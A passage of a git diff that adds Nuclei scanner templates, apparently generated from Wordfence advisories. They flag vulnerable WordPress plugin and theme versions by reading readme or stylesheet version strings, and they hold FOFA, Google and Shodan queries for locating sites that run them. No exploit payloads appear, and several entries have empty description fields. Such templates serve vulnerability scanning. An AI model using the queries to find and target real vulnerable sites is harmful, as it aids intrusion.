+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "listdom"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 3.7.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11880.yaml b/poc/cve/CVE-2024-11880.yaml
new file mode 100644
index 0000000000..72154af6d6
--- /dev/null
+++ b/poc/cve/CVE-2024-11880.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11880
+
+info:
+  name: >
+    B Testimonial – testimonial plugin for WP <= 1.2.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    The B Testimonial – testimonial plugin for WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'b_testimonial' shortcode in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/ea251110-02fa-4f4e-a578-855d3331b200?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-11880
+  metadata:
+    fofa-query: "wp-content/plugins/b-testimonial/"
+    google-query: inurl:"/wp-content/plugins/b-testimonial/"
+    shodan-query: 'vuln:CVE-2024-11880'
+  tags: cve,wordpress,wp-plugin,b-testimonial,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/b-testimonial/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "b-testimonial"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.2.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11897.yaml b/poc/cve/CVE-2024-11897.yaml
new file mode 100644
index 0000000000..b0323406d0
--- /dev/null
+++ b/poc/cve/CVE-2024-11897.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11897
+
+info:
+  name: >
+    Contact Form, Survey & Form Builder – MightyForms <= 1.3.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    The Contact Form, Survey & Form Builder – MightyForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mightyforms' shortcode in all versions up to, and including, 1.3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c691e469-3bd2-415d-8feb-9ae94aeaf339?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-11897
+  metadata:
+    fofa-query: "wp-content/plugins/mightyforms/"
+    google-query: inurl:"/wp-content/plugins/mightyforms/"
+    shodan-query: 'vuln:CVE-2024-11897'
+  tags: cve,wordpress,wp-plugin,mightyforms,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/mightyforms/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "mightyforms"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.3.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11903.yaml b/poc/cve/CVE-2024-11903.yaml
new file mode 100644
index 0000000000..4f57847bff
--- /dev/null
+++ b/poc/cve/CVE-2024-11903.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11903
+
+info:
+  name: >
+    WP eCards <= 1.3.904 - Authenticated (Contributor+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    The WP eCards plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ecard' shortcode in all versions up to, and including, 1.3.904 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa8e1df5-2e8a-4c84-83f8-6f6d53d00356?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-11903
+  metadata:
+    fofa-query: "wp-content/plugins/wp-ecards-invites/"
+    google-query: inurl:"/wp-content/plugins/wp-ecards-invites/"
+    shodan-query: 'vuln:CVE-2024-11903'
+  tags: cve,wordpress,wp-plugin,wp-ecards-invites,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wp-ecards-invites/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "wp-ecards-invites"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.3.904')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11935.yaml b/poc/cve/CVE-2024-11935.yaml
new file mode 100644
index 0000000000..cca9dc0ff5
--- /dev/null
+++ b/poc/cve/CVE-2024-11935.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11935
+
+info:
+  name: >
+    Email Address Obfuscation <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via class Parameter
+  author: topscoder
+  severity: low
+  description: >
+    The Email Address Obfuscation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘class’ parameter in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/8b777b19-ca0a-4082-80ee-e18a31ba6308?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-11935
+  metadata:
+    fofa-query: "wp-content/plugins/email-address-obfuscation/"
+    google-query: inurl:"/wp-content/plugins/email-address-obfuscation/"
+    shodan-query: 'vuln:CVE-2024-11935'
+  tags: cve,wordpress,wp-plugin,email-address-obfuscation,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/email-address-obfuscation/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "email-address-obfuscation"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11952.yaml b/poc/cve/CVE-2024-11952.yaml
new file mode 100644
index 0000000000..d40c41e161
--- /dev/null
+++ b/poc/cve/CVE-2024-11952.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11952
+
+info:
+  name: >
+    Classic Addons – WPBakery Page Builder <= 3.0 - Authenticated (Contributor+) Limited Local PHP File Inclusion
+  author: topscoder
+  severity: low
+  description: >
+    The Classic Addons – WPBakery Page Builder plugin for WordPress is vulnerable to Limited Local PHP File Inclusion in all versions up to, and including, 3.0 via the 'style' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, and permissions granted by an Administrator, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. The vulnerability is limited to PHP files in a Windows environment.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/9645b17e-6a7c-4cdd-ae43-7d2c84b624cc?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.5
+    cve-id: CVE-2024-11952
+  metadata:
+    fofa-query: "wp-content/plugins/classic-addons-wpbakery-page-builder-addons/"
+    google-query: inurl:"/wp-content/plugins/classic-addons-wpbakery-page-builder-addons/"
+    shodan-query: 'vuln:CVE-2024-11952'
+  tags: cve,wordpress,wp-plugin,classic-addons-wpbakery-page-builder-addons,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/classic-addons-wpbakery-page-builder-addons/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "classic-addons-wpbakery-page-builder-addons"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 3.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12099.yaml b/poc/cve/CVE-2024-12099.yaml
new file mode 100644
index 0000000000..0c6ca73484
--- /dev/null
+++ b/poc/cve/CVE-2024-12099.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12099
+
+info:
+  name: >
+    Dollie Hub – Build Your Own WordPress Cloud Platform <= 6.2.0 - Authenticated (Contributor+) Post Disclosure
+  author: topscoder
+  severity: low
+  description: >
+    The Dollie Hub – Build Your Own WordPress Cloud Platform plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 6.2.0 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/f29514d0-20a5-43f2-bf36-660579103220?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 4.3
+    cve-id: CVE-2024-12099
+  metadata:
+    fofa-query: "wp-content/plugins/dollie/"
+    google-query: inurl:"/wp-content/plugins/dollie/"
+    shodan-query: 'vuln:CVE-2024-12099'
+  tags: cve,wordpress,wp-plugin,dollie,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/dollie/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "dollie"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 6.2.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5020.yaml b/poc/cve/CVE-2024-5020.yaml
new file mode 100644
index 0000000000..a7f652303f
--- /dev/null
+++ b/poc/cve/CVE-2024-5020.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5020
+
+info:
+  name: >
+    Multiple Plugins <= (Various Versions) - Authenticated (Contributor+) Stored DOM-Based Cross-Site Scripting via FancyBox JavaScript Library
+  author: topscoder
+  severity: low
+  description: >
+    Multiple plugins for WordPress are vulnerable to Stored Cross-Site Scripting via the plugin's bundled FancyBox JavaScript library (versions 1.3.4 to 3.5.7) in various versions due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/d99d4b9a-aa09-434d-91a8-7afaa0e8b5db?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-5020
+  metadata:
+    fofa-query: "wp-content/plugins/easy-facebook-likebox-premium/"
+    google-query: inurl:"/wp-content/plugins/easy-facebook-likebox-premium/"
+    shodan-query: 'vuln:CVE-2024-5020'
+  tags: cve,wordpress,wp-plugin,easy-facebook-likebox-premium,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/easy-facebook-likebox-premium/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "easy-facebook-likebox-premium"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 6.6.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8962.yaml b/poc/cve/CVE-2024-8962.yaml
new file mode 100644
index 0000000000..12284561ea
--- /dev/null
+++ b/poc/cve/CVE-2024-8962.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8962
+
+info:
+  name: >
+    WPBITS Addons For Elementor Page Builder <= 1.5.2 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload
+  author: topscoder
+  severity: low
+  description: >
+    The WPBITS Addons For Elementor Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/f735f05d-8178-46bd-894d-49ccfb31d304?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-8962
+  metadata:
+    fofa-query: "wp-content/plugins/wpbits-addons-for-elementor/"
+    google-query: inurl:"/wp-content/plugins/wpbits-addons-for-elementor/"
+    shodan-query: 'vuln:CVE-2024-8962'
+  tags: cve,wordpress,wp-plugin,wpbits-addons-for-elementor,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wpbits-addons-for-elementor/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "wpbits-addons-for-elementor"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.5.2')
\ No newline at end of file
diff --git a/poc/detect/twenty-detect.yaml b/poc/detect/twenty-detect.yaml
new file mode 100644
index 0000000000..97a5fd67b4
--- /dev/null
+++ b/poc/detect/twenty-detect.yaml
@@ -0,0 +1,28 @@
+id: twenty-detect
+
+info:
+  name: Twenty - Detect
+  author: righettod
+  severity: info
+  description: |
+    Twenty products was detected.
+  reference:
+    - https://github.com/twentyhq/twenty
+    - https://twenty.com/
+  metadata:
+    max-request: 1
+    shodan-query: http.title:"Twenty"
+  tags: tech,twenty,detect
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/welcome"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_all(to_lower(body), "<title>twenty</title>", "open-source crm")'
+        condition: and
+# digest: 4a0a0047304502200890cba34fcec78aef4024ec6159d0d9c08948ec9cf02b23b59e0a7fececc1ac0221008b2e0fe13061aaaa75083359939b9d944ae0db9ade0ba36d2e6ae94dd0316785:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/microsoft/mightyforms.yaml b/poc/microsoft/mightyforms.yaml
new file mode 100644
index 0000000000..96b301187b
--- /dev/null
+++ b/poc/microsoft/mightyforms.yaml
@@ -0,0 +1,59 @@
+id: mightyforms
+
+info:
+  name: >
+    Contact Form, Survey & Form Builder – MightyForms <= 1.3.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c691e469-3bd2-415d-8feb-9ae94aeaf339?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/mightyforms/"
+    google-query: inurl:"/wp-content/plugins/mightyforms/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,mightyforms,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/mightyforms/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "mightyforms"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.3.9')
\ No newline at end of file
diff --git a/poc/open_redirect/eelv-redirection-7ba8c53e6fc7be568c3f7112b05c02cb.yaml b/poc/open_redirect/eelv-redirection-7ba8c53e6fc7be568c3f7112b05c02cb.yaml
new file mode 100644
index 0000000000..7c58c91542
--- /dev/null
+++ b/poc/open_redirect/eelv-redirection-7ba8c53e6fc7be568c3f7112b05c02cb.yaml
@@ -0,0 +1,59 @@
+id: eelv-redirection-7ba8c53e6fc7be568c3f7112b05c02cb
+
+info:
+  name: >
+    Simple Redirection <= 1.5 - Cross-Site Request Forgery to Arbitrary Site Redirect
+  author: topscoder
+  severity: medium
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/0fa84344-8672-43e1-a430-094021f7366f?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/eelv-redirection/"
+    google-query: inurl:"/wp-content/plugins/eelv-redirection/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,eelv-redirection,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/eelv-redirection/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "eelv-redirection"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.5')
\ No newline at end of file
diff --git a/poc/other/allaccessible.yaml b/poc/other/allaccessible.yaml
new file mode 100644
index 0000000000..8fbbd96aa6
--- /dev/null
+++ b/poc/other/allaccessible.yaml
@@ -0,0 +1,59 @@
+id: allaccessible
+
+info:
+  name: >
+    Accessibility by AllAccessible <= 1.3.4 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Option Update
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/bb65d916-7d9e-4562-ab9b-c7ba012a08fb?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/allaccessible/"
+    google-query: inurl:"/wp-content/plugins/allaccessible/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,allaccessible,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/allaccessible/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "allaccessible"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.3.4')
\ No newline at end of file
diff --git a/poc/other/amin-chat-button.yaml b/poc/other/amin-chat-button.yaml
new file mode 100644
index 0000000000..a7f648178b
--- /dev/null
+++ b/poc/other/amin-chat-button.yaml
@@ -0,0 +1,59 @@
+id: amin-chat-button
+
+info:
+  name: >
+    Pulsating Chat Button <= 1.3.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+  author: topscoder
+  severity: medium
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/cea8295b-b4be-4a95-9137-ad2033a5169d?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/amin-chat-button/"
+    google-query: inurl:"/wp-content/plugins/amin-chat-button/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,amin-chat-button,medium
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/amin-chat-button/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "amin-chat-button"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.3.6')
\ No newline at end of file
diff --git a/poc/other/anywhere-elementor-88412505e615b6e5307dc9f2ce5ac45d.yaml b/poc/other/anywhere-elementor-88412505e615b6e5307dc9f2ce5ac45d.yaml
new file mode 100644
index 0000000000..ff46a5f391
--- /dev/null
+++ b/poc/other/anywhere-elementor-88412505e615b6e5307dc9f2ce5ac45d.yaml
@@ -0,0 +1,59 @@
+id: anywhere-elementor-88412505e615b6e5307dc9f2ce5ac45d
+
+info:
+  name: >
+    AnyWhere Elementor <= 1.2.11 - Authenticated (Contributor+) Post Disclosure
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2138634-c149-4fd1-a33d-351bbf633ea3?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/anywhere-elementor/"
+    google-query: inurl:"/wp-content/plugins/anywhere-elementor/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,anywhere-elementor,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/anywhere-elementor/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "anywhere-elementor"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.2.11')
\ No newline at end of file
diff --git a/poc/other/b-testimonial.yaml b/poc/other/b-testimonial.yaml
new file mode 100644
index 0000000000..c712434e05
--- /dev/null
+++ b/poc/other/b-testimonial.yaml
@@ -0,0 +1,59 @@
+id: b-testimonial
+
+info:
+  name: >
+    B Testimonial – testimonial plugin for WP <= 1.2.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/ea251110-02fa-4f4e-a578-855d3331b200?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/plugins/b-testimonial/"
+    google-query: inurl:"/wp-content/plugins/b-testimonial/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-plugin,b-testimonial,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/b-testimonial/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "b-testimonial"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 1.2.2')
\ No newline at end of file
diff --git a/poc/other/blocksy-23bf7578ab264efcde56f6817c09d0fd.yaml b/poc/other/blocksy-23bf7578ab264efcde56f6817c09d0fd.yaml
new file mode 100644
index 0000000000..64bfad951e
--- /dev/null
+++ b/poc/other/blocksy-23bf7578ab264efcde56f6817c09d0fd.yaml
@@ -0,0 +1,59 @@
+id: blocksy-23bf7578ab264efcde56f6817c09d0fd
+
+info:
+  name: >
+    Blocksy <= 2.0.77 - Authenticated (Contributor+) Stored Cross-Site Scripting
+  author: topscoder
+  severity: low
+  description: >
+    
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/02ad47d5-f011-4e0a-af29-088852d1e886?source=api-scan
+  classification:
+    cvss-metrics: 
+    cvss-score: 
+    cve-id: 
+  metadata:
+    fofa-query: "wp-content/themes/blocksy/"
+    google-query: inurl:"/wp-content/themes/blocksy/"
+    shodan-query: 'vuln:'
+  tags: cve,wordpress,wp-theme,blocksy,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/themes/blocksy/style.css"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Version: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Version: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "blocksy"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 2.0.77')
\ No newline at end of file
diff --git a/poc/other/contact-form-with-a-meeting-scheduler-by-vcita-d660a0b48b863cdd67353bc56f435b10.yaml b/poc/other/contact-form-with-a-meeting-scheduler-by-vcita-d660a0b48b863cdd67353bc56f435b10.yaml
new file mode 100644
index 0000000000..24b9d52d13
--- /dev/null
+++ b/poc/other/contact-form-with-a-meeting-scheduler-by-vcita-d660a0b48b863cdd67353bc56f435b10.yaml
@@ -0,0 +1,59 @@
+id: contact-form-with-a-meeting-scheduler-by-vcita-d660a0b48b863cdd67353bc56f435b10
+
+info:
+  name: >
